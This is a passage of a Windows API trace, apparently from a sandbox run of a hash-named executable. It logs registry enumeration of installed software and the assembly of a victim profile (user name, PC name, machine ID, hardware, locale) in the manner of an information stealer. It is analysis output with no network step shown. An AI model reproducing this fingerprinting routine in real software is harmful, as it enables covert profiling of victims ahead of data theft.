C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\n", lpString2="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030" [0208.114] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="11.0.61030", lpcbData=0x19ce18*=0xb) returned 0x0 [0208.114] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 " [0208.114] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 ", lpString2="11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030" [0208.114] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\n" [0208.114] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.114] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x21, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.114] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned 94 [0208.114] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.114] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030", lpcbData=0x19ce18*=0x3d) returned 0x0 [0208.114] lstrlenA (lpString="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030") returned 60 [0208.114] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\n", lpString2="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft 